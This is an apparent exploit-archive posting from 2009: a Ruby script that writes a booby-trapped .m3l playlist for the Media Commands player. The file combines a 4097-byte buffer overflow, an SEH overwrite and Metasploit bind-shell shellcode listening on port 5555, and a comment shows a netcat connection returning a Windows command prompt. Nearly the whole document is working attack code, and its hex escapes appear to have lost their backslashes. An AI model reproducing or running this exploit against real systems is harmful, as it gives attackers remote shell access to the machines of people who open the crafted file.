Home / os / win10

mediacomm3l-overflow.txt

Posted on 05 March 2009

#!/usr/bin/env ruby
# Media Commands .m3l Local Buffer Overflow Exploit
# By Mountassif Moad
# Down : http://www.mediacommands.com/download/&product=MCV100A.exe
# C:
c>nc -v 127.0.0.1 5555
# DNS fwd/rev mismatch: localhost != stack-f286641
# localhost [127.0.0.1] 5555 (?) open
# Microsoft Windows XP [version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
# C:Program FilesMedia CommandsAnimation>
# exit Booooooooooom
time3 = Time.new
puts "Exploit Started in Current Time :" + time3.inspect
puts "Enter Name For your File Like : Stack"
moad = gets.chomp.capitalize
puts "Name Of File : " + moad +'.m3l'
time1 = Time.new
$VERBOSE=nil
Header =
"x5Bx70x6Cx61x79x6Cx69x73x74"+
"x5Dx0Dx4Ex75x6Dx62x65x72"+
"x4Fx66x45x6Ex74x72x69x65"+
"x73x3Dx31x0Dx46x69x6Cx65x31x3D"
# win32_bind -  EXITFUNC=seh LPORT=5555 Size=709 Encoder=PexAlphaNum http://metasploit.com
Shellcode =
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"+
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"+
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"+
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"+
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx46x4bx4e"+
"x4dx54x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x36x4bx58"+
"x4ex46x46x42x46x52x4bx58x45x44x4ex53x4bx48x4ex47"+
"x45x30x4ax47x41x30x4fx4ex4bx48x4fx34x4ax41x4bx48"+
"x4fx55x42x32x41x50x4bx4ex49x54x4bx38x46x33x4bx48"+
"x41x50x50x4ex41x53x42x4cx49x49x4ex4ax46x58x42x4c"+
"x46x37x47x50x41x4cx4cx4cx4dx50x41x30x44x4cx4bx4e"+
"x46x4fx4bx33x46x35x46x32x4ax52x45x57x45x4ex4bx48"+
"x4fx55x46x52x41x50x4bx4ex48x36x4bx48x4ex50x4bx54"+
"x4bx38x4fx45x4ex31x41x50x4bx4ex43x30x4ex32x4bx58"+
"x49x48x4ex46x46x32x4ex41x41x56x43x4cx41x43x4bx4d"+
"x46x46x4bx58x43x34x42x43x4bx48x42x34x4ex50x4bx58"+
"x42x37x4ex41x4dx4ax4bx58x42x34x4ax50x50x35x4ax36"+
"x50x38x50x34x50x50x4ex4ex42x55x4fx4fx48x4dx48x46"+
"x43x35x48x56x4ax46x43x53x44x53x4ax46x47x47x43x37"+
"x44x53x4fx35x46x45x4fx4fx42x4dx4ax46x4bx4cx4dx4e"+
"x4ex4fx4bx33x42x55x4fx4fx48x4dx4fx55x49x58x45x4e"+
"x48x36x41x48x4dx4ex4ax50x44x30x45x55x4cx46x44x30"+
"x4fx4fx42x4dx4ax56x49x4dx49x50x45x4fx4dx4ax47x45"+
"x4fx4fx48x4dx43x35x43x45x43x35x43x45x43x55x43x34"+
"x43x55x43x44x43x35x4fx4fx42x4dx48x36x4ax46x45x41"+
"x43x4bx48x36x43x45x49x48x41x4ex45x39x4ax56x46x4a"+
"x4cx31x42x57x47x4cx47x35x4fx4fx48x4dx4cx56x42x41"+
"x41x45x45x45x4fx4fx42x4dx4ax36x46x4ax4dx4ax50x52"+
"x49x4ex47x55x4fx4fx48x4dx43x35x45x55x4fx4fx42x4d"+
"x4ax46x45x4ex49x44x48x48x49x44x47x45x4fx4fx48x4d"+
"x42x55x46x55x46x45x45x45x4fx4fx42x4dx43x59x4ax56"+
"x47x4ex49x57x48x4cx49x47x47x55x4fx4fx48x4dx45x35"+
"x4fx4fx42x4dx48x36x4cx46x46x46x48x36x4ax46x43x46"+
"x4dx46x49x48x45x4ex4cx56x42x55x49x55x49x32x4ex4c"+
"x49x48x47x4ex4cx36x46x34x49x48x44x4ex41x43x42x4c"+
"x43x4fx4cx4ax50x4fx44x54x4dx42x50x4fx44x44x4ex32"+
"x43x39x4dx58x4cx47x4ax43x4bx4ax4bx4ax4bx4ax4ax36"+
"x44x57x50x4fx43x4bx48x41x4fx4fx45x37x46x44x4fx4f"+
"x48x4dx4bx55x47x55x44x45x41x45x41x45x41x45x4cx56"+
"x41x30x41x45x41x55x45x35x41x55x4fx4fx42x4dx4ax56"+
"x4dx4ax49x4dx45x30x50x4cx43x45x4fx4fx48x4dx4cx46"+
"x4fx4fx4fx4fx47x33x4fx4fx42x4dx4bx58x47x45x4ex4f"+
"x43x48x46x4cx46x36x4fx4fx48x4dx44x45x4fx4fx42x4d"+
"x4ax56x42x4fx4cx38x46x30x4fx55x43x55x4fx4fx48x4d"+
"x4fx4fx42x4dx5a"
Bof    =  "x41" * 4097
Nseh = "xEBx06x90x90"
seh  = "x35x2FxC6x72"
Nop  = "x90" * 15
crash =  Header + Bof + Nseh + seh + Nop + Shellcode
File.open( moad+".m3l", "w" ) do |the_file|
the_file.puts(crash)
puts "Exploit finished in Current Time :" + time1.inspect
puts "Now Open " + moad +".m3l :d"
end

 

TOP